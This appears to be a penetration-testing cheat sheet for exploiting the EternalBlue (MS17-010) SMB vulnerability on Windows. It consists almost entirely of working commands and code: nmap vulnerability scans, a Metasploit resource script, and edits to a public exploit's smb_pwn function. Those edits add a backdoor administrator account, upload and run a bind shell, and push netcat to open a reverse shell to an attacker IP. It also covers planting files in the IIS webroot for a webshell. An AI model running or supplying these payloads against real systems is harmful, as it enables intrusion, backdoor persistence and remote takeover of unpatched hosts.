nmap -Pn -sV -p 445 --script=smb-vuln* -d $IP
nmap -Pn -sV -p 445 --script=smb-vuln* --script-args=smbdomain=example,smbusername=user1,smbpassword=mypass -d $IP
Exploit using Metasploit
When it works, a session is opened. See Metasploit.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS x.x.x.x
set PAYLOAD windows/x64/shell_bind_tcp
set VERBOSE true
set ExitOnSession false
exploit -j
Run the exploit
sudo msfconsole -q -r msf-smb-exploit.rc
Exploit manually
- Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 – ‘EternalBlue’ SMB Remote Code Execution (MS17-010)
searchsploit -m 42315
wget -O
Add payload to the exploit
Edit function smb_pwn to add a payload. Default payload creates a file “c:\pwned.txt”.
Payload 1 – Add a user

Requires administrator privileges. Be mindful of the password policy when creating accounts.
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
# Add a user
service_exec(conn, r'net user /add myprecious yep-MS17-010')
service_exec(conn, r'net localgroup "Administrators" myprecious /add')
Payload 2 – Bind shell
msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe > shell.exe
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
# Start a listener (bind shell)
smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
service_exec(conn, r'c:\test.exe')
Payload 3 – Reverse shell with Netcat
cp /usr/share/windows-resources/binaries/nc.exe .
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
# Send netcat to the victim and obtain a reverse shell
smb_send_file(smbConn, 'nc.exe', 'C', '/test.exe')
service_exec(conn, r'C:\\test.exe -nv x.x.x.x 4444 -e C:\\Windows\\System32\\cmd.exe')
Payload 4 – Send file to IIS default directory
Adapt to get a webshell.
smb_send_file(smbConn, 'test.txt', 'C', '/inetpub/wwwroot/test.txt')
Custom SMB Port
If you need a custom port (not 445), modify to add the port:
class MYSMB(smb.SMB):
def __init__(self, remote_host, remote_port=4555, use_ntlmv2=True, timeout=8):
self.__use_ntlmv2 = use_ntlmv2
self._default_tid = 0
self._pid = os.getpid() & 0xffff
self._last_mid = random.randint(1000, 20000)
if 0x4000 <= self._last_mid <= 0x4110:
self._last_mid += 0x120
self._pkt_flags2 = 0
self._last_tid = 0 # last tid from connect_tree()
self._last_fid = 0 # last fid from nt_create_andx()
self._smbConn = None
smb.SMB.__init__(self, remote_host, remote_host, sess_port=4555, timeout=timeout)
Find named PIPE

Run full Nmap scan of all ports to find other pipes!
impacket-rpcdump $IP > rpc.txt
grep ncacn_np rpc.txt | sort | uniq
git clone
cd pipe-scan
python2 $IP 139
On Windows
Use piplist.exe from Sysinternals.
Run the exploit

Requires Python v2, do not use Python v3. Do not forget to edit SMB credentials in the exploit if needed.
pip2 install impacket
python2 $IP $PIPE
python2 $IP eventlog
# \\$IP\pipe\sql\query
python2 $IP sql\\query

This can generate errors “ERROR_SERVICE_REQUEST_TIMEOUT” and still work…
Payload 1 (user added)
rdesktop -u myprecious -p yep-MS17-010 $IP -r disk:myshare=/home/kali/share
Payload 2 (bind shell)
nc -nv $IP 4444
Payload 3 (reverse shell, start a listener before exploit)
nc -nlvkp 4444